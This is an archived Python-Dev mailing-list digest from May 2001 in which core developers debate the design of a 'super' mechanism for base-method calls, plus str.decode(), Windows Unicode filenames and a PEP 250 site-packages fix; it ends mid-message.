Python Software:                        http://www.lemburg.com/python/


From thomas.heller@ion-tof.com  Wed May  2 15:06:39 2001
From: thomas.heller@ion-tof.com (Thomas Heller)
Date: Wed, 2 May 2001 16:06:39 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>              <20010502085741.B515@gerg.ca>  <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff>
Message-ID: <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook>

/F:
> guido wrote:
> 
> > > class MyClass (BaseClass):
> > >     def foo (self, arg1, arg2):
> > >          super.foo(arg1, arg2)
> >
> > I'm sure that's everybody's favorite way to spell it!
> 
> not mine.  my brain contains far too much Python 1.5.2 code
> for it to accept that some variables are dynamically scoped,
> while others are lexically scoped.
> 
> why not spell it out:
> 
>     self.__super__.foo(arg1, arg2)
> 
> or
> 
>     self.super.foo(arg1, arg2)
> 
> or
> 
>     super(self).foo(arg1, arg2)
IMO we still need to specify the class, and there we are:

     super(self, MyClass).foo(arg1, arg2)

Thomas


From guido@digicool.com  Wed May  2 16:11:17 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 10:11:17 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 16:02:41 +0200."
 <3AF01381.592AE31B@lemburg.com>
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com>
 <3AF01381.592AE31B@lemburg.com>
Message-ID: <200105021511.KAA32271@cj20424-a.reston1.va.home.com>

> Guido van Rossum wrote:
> > 
> > > This doesn't work in Python since Python has multiple inheritence,
> > > e.g. super in
> > >
> > > class A(B,C):
> > >       def foo(self):
> > >               super.foo()
> > >
> > > is ambiguous.
> > 
> > I'm not sure what you mean.  The search is totally well-defined: first
> > search B for a foo method, then search C.
> 
> I thought you were talking about an abstract super class which is
> how Java uses this term. 

Ah.  I didn't realize.  This would suggest that another (not yet
mentioned) suggestion would be to spell the basemethod call as

    super.foo(self)

keeping more in line with the tradition of passing self explicitly
when calling basemethods.

> Rereading some of the posts, I think you are indeed referring to
> the method which foo overrides -- this is what I call basemethod
> (since it is implemented in one of the base classes).

Aha.

> > > I'd rather suggest adding a function for finding the basemethod
> > > of a method. This is probably the most common task in this context.
> > 
> > I've never heard of the concept of basemethod, but if I may venture a
> > guess, it would be the same definition as I give above.
> 
> The basemethod can be defined as the first method of the same name
> found in the inheritence tree using the standard Python lookup 
> strategy (left-right, depth first) when continuing the lookup search
> at the node in the inheritence tree which defines the method querying
> the basemethod.

Yes, that's what I guessed.

> In other words: you let Python continue the search for the method
> as if it hadn't found the occurrance calling the basemethod()
> API. Hmm, still not clear enough... better let Tim jump in here
> (we've had a discussion about basemethod() some months or years
> ago). Tim ?
> 
> Note that there are many ways of defining what a basemethod
> is, due to the ambiguities that are caused by multiple inheritence
> (e.g. the same base class may appear in different branches of the
> inheritence tree).

Well, the search will find one definite method, but you're right that
there may be situations where it's necessary to specify the specific
base class!

In C++ that is solved by writing B::foo() or C::foo().  Python doesn't
have "::" and instead overloads the "." operator.  Hmm, so even
introducing super doesn't completely remove the need to be able to
write C.foo to reference the unbound method foo of class C, and this
may require that my ugly rule still be needed.

AFAIK, Smalltalk has only single inheritance, and so does Java, so
there 'super' is enough.  Will we need to add a "::" operator to
Python???

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Wed May  2 16:19:07 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 10:19:07 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 16:04:29 +0200."
 <3AF013ED.8A190FE2@lemburg.com>
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com>
 <3AF013ED.8A190FE2@lemburg.com>
Message-ID: <200105021519.KAA32312@cj20424-a.reston1.va.home.com>

> Here's an implementation of what I currently use to track down
> the basemethod (taken from mx.Tools):

How am I supposed to use this?

I tried this:

    class B:
        def foo(self):
            print "B.foo"

    class C(B):
        def foo(self):
            print "C.foo"
            B.foo(self)
            print basemethod(self.foo) # Expect this to be B.foo

    class D(C):
        def foo(self):
            print "D.foo"
            C.foo(self)

    d = D()
    d.foo()

but the call to basemethod(self.foo) in C prints C.foo, not B.foo as
required.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Wed May  2 16:23:33 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 10:23:33 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 14:48:20 +1200."
 <200105020248.OAA16329@s454.cosc.canterbury.ac.nz>
References: <200105020248.OAA16329@s454.cosc.canterbury.ac.nz>
Message-ID: <200105021523.KAA32340@cj20424-a.reston1.va.home.com>

> > Except that sometimes you really do want x.__class__.__classdict__ to
> > have priority (e.g. for "guarded" attributes).
> 
> What's a "guarded" attribute?

I meant an attribute that's implemented by a pair of get and set
functions.  This is very useful; my proposed design lets you define
this more directly rather than requiring you to override __getattr__
and __setattr__.

> > But the issue of backwards compatibility is a big one here
> 
> I was thinking that, while this is still in the __future__,
> the __dict__ attribute would be a pseudo-dict that, by
> default, behaves like the union of the old __dict__ and
> the __classdict__.

Actually, I think that what's in the __dict__ is just perfect; it's
the definition of getattr(classobject, name) where name is both an
instance and a class method that causes trouble.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal@lemburg.com  Wed May  2 15:29:20 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 16:29:20 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com>
 <3AF013ED.8A190FE2@lemburg.com> <200105021519.KAA32312@cj20424-a.reston1.va.home.com>
Message-ID: <3AF019C0.716E6D35@lemburg.com>

Guido van Rossum wrote:
> 
> > Here's an implementation of what I currently use to track down
> > the basemethod (taken from mx.Tools):
> 
> How am I supposed to use this?
> 
> I tried this:
> 
>     class B:
>         def foo(self):
>             print "B.foo"
> 
>     class C(B):
>         def foo(self):
>             print "C.foo"
>             B.foo(self)
>             print basemethod(self.foo) # Expect this to be B.foo

This finds the basemethod of self.foo meaning the method overridden
by D.foo. To get at the basemethod of C.foo, you'd have to call

basemethod(self, C.foo)

Note that the intent here is to be able to call basemethods
even in case the defining class is only mixin class -- a very
common situation at least in many of my applications (keeps
inheritance trees shallow and increases readability of the code).
 
>     class D(C):
>         def foo(self):
>             print "D.foo"
>             C.foo(self)
> 
>     d = D()
>     d.foo()
> 
> but the call to basemethod(self.foo) in C prints C.foo, not B.foo as
> required.
> 
> --Guido van Rossum (home page: http://www.python.org/~guido/)
> 
> _______________________________________________
> Python-Dev mailing list
> Python-Dev@python.org
> http://mail.python.org/mailman/listinfo/python-dev

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From fredrik@effbot.org  Wed May  2 15:15:58 2001
From: fredrik@effbot.org (Fredrik Lundh)
Date: Wed, 2 May 2001 16:15:58 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>              <20010502085741.B515@gerg.ca>  <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook>
Message-ID: <002c01c0d312$6a195110$e46940d5@hagrid>

thomas wrote:

> > why not spell it out:
> > 
> >     self.__super__.foo(arg1, arg2)
> > 
> > or
> > 
> >     self.super.foo(arg1, arg2)
> > 
> > or
> > 
> >     super(self).foo(arg1, arg2)
>
> IMO we still need to specify the class, and there we are:
> 
>      super(self, MyClass).foo(arg1, arg2)

isn't that the same as self.__class__ ?  in which case
super is something like:

import new

class super:
    def __init__(self, instance):
        self.instance = instance
    def __getattr__(self, name):
        for klass in self.instance.__class__.__bases__:
            member = getattr(klass, name, None)
            if member:
                if callable(member):
                    return new.instancemethod(member, self.instance, klass)
                return member
        raise AttributeError(name)

(I'm even more confused than my pythonware.com colleague)

Cheers /F


From Donald Beaudry <donb@abinitio.com>  Wed May  2 15:41:14 2001
From: Donald Beaudry <donb@abinitio.com> (Donald Beaudry)
Date: Wed, 02 May 2001 10:41:14 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com>
Message-ID: <200105021441.KAA08444@localhost.localdomain>

Guido van Rossum <guido@digicool.com> wrote,
> [Greg Ward, welcome back!]
> >   * 'super' is a magic object that only makes sense inside a 'def'
> >     inside a 'class' (at least for now; perhaps it could be generalized
> >     to work at class scope as well as method scope, but let's keep
> >     it simple)
> 
> Yes, that's about the only way it can be made to work.  The compiler
> will have to (1) detect that 'super' is a free variable, and (2) make
> it a local and initialize it with the proper magic.  Or, to relieve
> the burden from the symbol table, we could make super a keyword, at
> the cost of breaking existing code.

I'm not at all sure I like the idea of 'super'.  It's far more magic
that I am used to (coming from Python at least).  Currently, we spell
'super' like this:

     class foo(bar):
         def __repr__(self):
             return bar.__repr__(self)  # that's super!

I like the explicit nature of it.  As Guido points out however, this
ends up being ambiguous when we try to make classes more
"instance-like".

Now, how do I like to spell super?

     class foo(bar):
         def __repr__(self):
             return bar._.__repr__(self)  # now that's really super!

or, for those who like the "keyword":

     class foo(bar):
         def __repr__(self):
             super = bar._
             return super.__repr__(self)

The trick here in the implementation of getattr on the '_'.  It return
a proxy object for the class.  When attributes are accessed through it
a different search path is taken.  This path is the same path that
would be taken by instance attribute look up.  In my code, I refer to
this object as the 'unbound instance'.  Since accessing a function
through this object will yield an unbound instance method, the name
makes sense to me.

--
Donald Beaudry                                     Ab Initio Software Corp.
                                                   201 Spring Street
donb@init.com                                      Lexington, MA 02421
                  ...So much code, so little time...


From thomas.heller@ion-tof.com  Wed May  2 15:49:02 2001
From: thomas.heller@ion-tof.com (Thomas Heller)
Date: Wed, 2 May 2001 16:49:02 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>              <20010502085741.B515@gerg.ca>  <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid>
Message-ID: <075101c0d317$07516fe0$e000a8c0@thomasnotebook>

> thomas wrote:
> 
> > > why not spell it out:
> > > 
> > >     self.__super__.foo(arg1, arg2)
> > > 
> > > or
> > > 
> > >     self.super.foo(arg1, arg2)
> > > 
> > > or
> > > 
> > >     super(self).foo(arg1, arg2)
> >
> > IMO we still need to specify the class, and there we are:
> > 
> >      super(self, MyClass).foo(arg1, arg2)
> 
> isn't that the same as self.__class__ ?  in which case
> super is something like:
> 
> import new
> 
> class super:
>     def __init__(self, instance):
>         self.instance = instance
>     def __getattr__(self, name):
>         for klass in self.instance.__class__.__bases__:
>             member = getattr(klass, name, None)
>             if member:
>                 if callable(member):
>                     return new.instancemethod(member, self.instance, klass)
>                 return member
>         raise AttributeError(name)
> 
No, it's not the same. Consider:

class X:
    def test(self):
        print "test X"

class Y(X):
    def test(self):
        print "test Y"
        super(self).test()

class Z(Y):
    pass
        
X().test()
print
Y().test()
print
Z().test()
print

This prints:
test X

test Y
test X

test Y
test Y
(more test Y lines deleted)
Runtime error: maximum recursion depth exceeded

This is because super(self).test for the Z() object
should start the search in the X class, not in the Y class.


Thomas


From thomas.heller@ion-tof.com  Wed May  2 15:53:17 2001
From: thomas.heller@ion-tof.com (Thomas Heller)
Date: Wed, 2 May 2001 16:53:17 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>              <20010502085741.B515@gerg.ca>  <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid>
Message-ID: <078f01c0d317$9f6a5b70$e000a8c0@thomasnotebook>

This implementation of super works correctly:

import new

class super:
    def __init__(self, instance, klass):
        self.instance = instance
        self.klass = klass
    def __getattr__(self, name):
        for klass in (self.klass,) + self.klass.__bases__:
            member = getattr(klass, name, None)
            if member:
                if callable(member):
                    return new.instancemethod(member, self.instance, klass)
                return member
        raise AttributeError(name)

class X:
    def test(self):
        print "test X"

class Y(X):
    def test(self):
        print "test Y"
        super(self, X).test()

class Z(Y):
    pass
        
X().test()
print
Y().test()
print
Z().test()
print

Thomas


From Donald Beaudry <donb@abinitio.com>  Wed May  2 16:31:45 2001
From: Donald Beaudry <donb@abinitio.com> (Donald Beaudry)
Date: Wed, 02 May 2001 11:31:45 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> <3AF01381.592AE31B@lemburg.com> <200105021511.KAA32271@cj20424-a.reston1.va.home.com>
Message-ID: <200105021531.LAA08940@localhost.localdomain>

Guido van Rossum <guido@digicool.com> wrote,
> AFAIK, Smalltalk has only single inheritance, and so does Java, so
> there 'super' is enough.  Will we need to add a "::" operator to
> Python???

Multiple inheritance introduces a potential wrinkle in my definition
of the unbound instance.  The problem is that search starts one level
too high.  That is in:

    class foo(b1, b2):
          def __repr__(self):
              super = b1._  #this one
              super = b2._  #or this one?
              return super.__repr__(self)

we dont know which base class to choose as the starting point for the
search.  This problem already exist.  Now, if we want to avoid it,
this:

    class foo(b1, b2):
          def __repr__(self):
              super = foo.__super__
              return super.__repr__(self)


comes to mind.

--
Donald Beaudry                                     Ab Initio Software Corp.
                                                   201 Spring Street
donb@init.com                                      Lexington, MA 02421
                      ...Will hack for sushi...


From Donald Beaudry <donb@abinitio.com>  Wed May  2 16:37:39 2001
From: Donald Beaudry <donb@abinitio.com> (Donald Beaudry)
Date: Wed, 02 May 2001 11:37:39 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid>
Message-ID: <200105021537.LAA09063@localhost.localdomain>

"Fredrik Lundh" <fredrik@effbot.org> wrote,
> thomas wrote:
> 
> > > why not spell it out:
> > > 
> > >     self.__super__.foo(arg1, arg2)
> > > 
> > > or
> > > 
> > >     self.super.foo(arg1, arg2)
> > > 
> > > or
> > > 
> > >     super(self).foo(arg1, arg2)
> >
> > IMO we still need to specify the class, and there we are:
> > 
> >      super(self, MyClass).foo(arg1, arg2)
> 
> isn't that the same as self.__class__ ?  in which case
> super is something like:

super is a lexically scoped concept.  You cant ask the instance for it
since it's value is different depending on in which it is needed Just
as:

        class foo(bar):
              def __repr__(self):
                  return self.__class__.__repr__(self)

would get you into an infinite loop, while:

        class foo(bar):
              def __repr__(self):
                  return bar.__repr__(self)

wont.  Now, dont go thinking that

        class foo(bar):
              def __repr__(self):
                  return self.__class__.__base__[0].__repr__(self)

will do you any good either ;) Because it wont!

--
Donald Beaudry                                     Ab Initio Software Corp.
                                                   201 Spring Street
donb@init.com                                      Lexington, MA 02421
                  ...So much code, so little time...


From guido@digicool.com  Wed May  2 18:02:19 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 12:02:19 -0500
Subject: [Python-Dev] Unicode and the Windows file system.
In-Reply-To: Your message of "Fri, 27 Apr 2001 00:26:39 +1000."
 <LCEPIIGDJPKCOIHOBJEPIEMMDKAA.MarkH@ActiveState.com>
References: <LCEPIIGDJPKCOIHOBJEPIEMMDKAA.MarkH@ActiveState.com>
Message-ID: <200105021702.MAA01317@cj20424-a.reston1.va.home.com>

> Now that 2.1 is out the door, how do we feel about getting these Unicode
> changes in?
> 
> http://sourceforge.net/tracker/?func=detail&aid=410465&group_id=5470&atid=305470 

No problem for me, although the context-sensitive semantics of the
MBCS encoding still elude me.  (Who cares, it's Windows. :-)

Are you & MAL capable of sorting this out?  Do you want me to add a +1
comment to the tracker?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From gmcm@hypernet.com  Wed May  2 17:01:20 2001
From: gmcm@hypernet.com (Gordon McMillan)
Date: Wed, 2 May 2001 12:01:20 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105021523.KAA32340@cj20424-a.reston1.va.home.com>
References: Your message of "Wed, 02 May 2001 14:48:20 +1200."             <200105020248.OAA16329@s454.cosc.canterbury.ac.nz>
Message-ID: <3AEFF710.9471.8025D7EA@localhost>

Hmmm.

Some time ago, Tim asked the question: "Why do you wnat 
this stuff?". As far as I can recall, he got 2 answers: "So I 
don't have to 'initialize(Klass)'" and "me, too". I don't think 
those qualify as answers.

Some time ago (cf, types-sig brouhaha of a couple years ago) 
I concluded that the only purpose for this stuff was __getattr__ 
and __setattr__ hacks. I reached this conclusion by going 
nutzo using (Guido's) metaclass hook, and studying the 
available uses of ExtensionClass (I could find no public usage 
of Don's elegant madness).

I rather liked Guido's "Turtles all the way down" (but his 
description was so cryptic that my interpretation may have 
been a hallucination), and I suspect he's still headed that way.

Nonetheless, I would like to see this discussion of the 
elegance of SmallTalk's incompatible model (and how to fudge 
it in Python) balanced by some discussion of the expected 
pragmatic benefits. (That's a different topic from subclassing 
types.)

start-with-"if-God-wanted-metaclasses-he-wouldn't-have-
invented-proxies"-<wink>-ly y'rs


- Gordon


From fredrik@effbot.org  Wed May  2 16:47:08 2001
From: fredrik@effbot.org (Fredrik Lundh)
Date: Wed, 2 May 2001 17:47:08 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> <200105021537.LAA09063@localhost.localdomain>
Message-ID: <00a901c0d31f$2797a370$e46940d5@hagrid>

Donald Beaudry wrote:
> super is a lexically scoped concept.  You cant ask the instance for it
> since it's value is different depending on in which it is needed

oh, you want people to be able to inherit from classes
using super?

guess we'll have to use

        sys._getframe().f_back.f_method.im_class

instead, then ;-)

(any special reason why frame objects don't contain a
pointer to the corresponding function/method object?)

Cheers /F


From mal@lemburg.com  Wed May  2 17:11:50 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 18:11:50 +0200
Subject: [Python-Dev] Unicode and the Windows file system.
References: <LCEPIIGDJPKCOIHOBJEPIEMMDKAA.MarkH@ActiveState.com> <200105021702.MAA01317@cj20424-a.reston1.va.home.com>
Message-ID: <3AF031C6.324D25D5@lemburg.com>

Guido van Rossum wrote:
> 
> > Now that 2.1 is out the door, how do we feel about getting these Unicode
> > changes in?
> >
> > http://sourceforge.net/tracker/?func=detail&aid=410465&group_id=5470&atid=305470
> 
> No problem for me, although the context-sensitive semantics of the
> MBCS encoding still elude me.  (Who cares, it's Windows. :-)
> 
> Are you & MAL capable of sorting this out?  Do you want me to add a +1
> comment to the tracker?

I'll take care of the parser marker stuff and Mark can do the
rest ;-)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido@digicool.com  Wed May  2 18:17:50 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 12:17:50 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 17:47:08 +0200."
 <00a901c0d31f$2797a370$e46940d5@hagrid>
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> <200105021537.LAA09063@localhost.localdomain>
 <00a901c0d31f$2797a370$e46940d5@hagrid>
Message-ID: <200105021717.MAA01518@cj20424-a.reston1.va.home.com>

> (any special reason why frame objects don't contain a
> pointer to the corresponding function/method object?)

Because (until now) there was no need.  The frame needs to know about
the code object, but the rest of the function's context is not needed.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal@lemburg.com  Wed May  2 19:13:17 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 20:13:17 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
Message-ID: <3AF04E3D.45AE4F4B@lemburg.com>

We already have "data".encode(encoding) which encodes the string data
by passing it through the encoder of the given encoding.

Wouldn't it be worthwhile to add direct access to codec decoders
through string methods as well ?

(Note that this addition only makes sense for string objects,
since Unicode cannot be decoded.)

Also, would there be any objections adding some more standard
codecs to the system ? I'm thinking of wrapping the binascii 
module APIs in form of codecs...

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido@digicool.com  Wed May  2 20:18:26 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 14:18:26 -0500
Subject: [Python-Dev] "data".decode(encoding) ?!
In-Reply-To: Your message of "Wed, 02 May 2001 20:13:17 +0200."
 <3AF04E3D.45AE4F4B@lemburg.com>
References: <3AF04E3D.45AE4F4B@lemburg.com>
Message-ID: <200105021918.OAA03080@cj20424-a.reston1.va.home.com>

> We already have "data".encode(encoding) which encodes the string data
> by passing it through the encoder of the given encoding.
> 
> Wouldn't it be worthwhile to add direct access to codec decoders
> through string methods as well ?
> 
> (Note that this addition only makes sense for string objects,
> since Unicode cannot be decoded.)
> 
> Also, would there be any objections adding some more standard
> codecs to the system ? I'm thinking of wrapping the binascii 
> module APIs in form of codecs...

Can you provide examples of where this can't be done using the
existing approach?

Code-bloat police anyone?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal@lemburg.com  Wed May  2 19:32:46 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 20:32:46 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com>
Message-ID: <3AF052CE.E928BDA1@lemburg.com>

Guido van Rossum wrote:
> 
> > We already have "data".encode(encoding) which encodes the string data
> > by passing it through the encoder of the given encoding.
> >
> > Wouldn't it be worthwhile to add direct access to codec decoders
> > through string methods as well ?
> >
> > (Note that this addition only makes sense for string objects,
> > since Unicode cannot be decoded.)
> >
> > Also, would there be any objections adding some more standard
> > codecs to the system ? I'm thinking of wrapping the binascii
> > module APIs in form of codecs...
> 
> Can you provide examples of where this can't be done using the
> existing approach?

There is no existing elegant approach except hooking up to the
codecs directly. Adding .decode() is really a matter of adding
symmetry.

Here are some example of how these two codec methods could
be used:

	xmltext = binarydata.encode('base64')
	...
	binarydata = xmltext.decode('base64')

	zzz = data.encode('gzip')
	...
	data = zzz.decode('gzip')

	jpegimage = gifimage.decode('gif').encode('jpeg')

	mp3audio = wavaudio.decode('wav').encode('mp3')

	etc.

Basically all content transfer encodings can take advantage of
these two methods.

It's not really code bloat, BTW, since the C API is there;
the .decode() method would just expose it.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido@digicool.com  Wed May  2 20:38:10 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 14:38:10 -0500
Subject: [Python-Dev] "data".decode(encoding) ?!
In-Reply-To: Your message of "Wed, 02 May 2001 20:32:46 +0200."
 <3AF052CE.E928BDA1@lemburg.com>
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com>
 <3AF052CE.E928BDA1@lemburg.com>
Message-ID: <200105021938.OAA03550@cj20424-a.reston1.va.home.com>

> > Can you provide examples of where this can't be done using the
> > existing approach?
> 
> There is no existing elegant approach except hooking up to the
> codecs directly. Adding .decode() is really a matter of adding
> symmetry.

Yes, but symmetry is good except when it isn't. :-)

> Here are some example of how these two codec methods could
> be used:
> 
> 	xmltext = binarydata.encode('base64')
> 	...
> 	binarydata = xmltext.decode('base64')
> 
> 	zzz = data.encode('gzip')
> 	...
> 	data = zzz.decode('gzip')
> 
> 	jpegimage = gifimage.decode('gif').encode('jpeg')
> 
> 	mp3audio = wavaudio.decode('wav').encode('mp3')
> 
> 	etc.

How would you do this currently?

> Basically all content transfer encodings can take advantage of
> these two methods.
> 
> It's not really code bloat, BTW, since the C API is there;
> the .decode() method would just expose it.

Show me the patch and I'll decide whether it's code bloat. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fredrik@effbot.org  Wed May  2 19:20:24 2001
From: fredrik@effbot.org (Fredrik Lundh)
Date: Wed, 2 May 2001 20:20:24 +0200
Subject: [Python-Dev] PEP 250 buglet
Message-ID: <004b01c0d334$8f600a50$e46940d5@hagrid>

PEP 250 suggests changing the sitedirs setup in site.py from

    sitedirs = [prefix]

to

    sitedirs == [makepath(prefix, "lib", "site-packages")]

on windows. it then goes on to say that

    This change does not preclude packages using the current
    location -- the change only adds a directory to sys.path, it
    does not remove anything.

this isn't true (even after correcting the typo), since the
sitedirs list isn't only added to the path; it's also used to
look for PTH files.  after this change, PTH files located under
prefix will no longer be found.

the following change works a bit better:

    sitedirs = [prefix, makepath(prefix, "lib", "site-packages")]

Cheers /F


From mal@lemburg.com  Wed May  2 20:55:25 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 21:55:25 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com>
 <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com>
Message-ID: <3AF0662D.48671B4E@lemburg.com>

This is a multi-part message in MIME format.
--------------891C60CC0A920DAE275D45C5
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Guido van Rossum wrote:
> 
> > > Can you provide examples of where this can't be done using the
> > > existing approach?
> >
> > There is no existing elegant approach except hooking up to the
> > codecs directly. Adding .decode() is really a matter of adding
> > symmetry.
> 
> Yes, but symmetry is good except when it isn't. :-)
> 
> > Here are some example of how these two codec methods could
> > be used:
> >
> >       xmltext = binarydata.encode('base64')
> >       ...
> >       binarydata = xmltext.decode('base64')
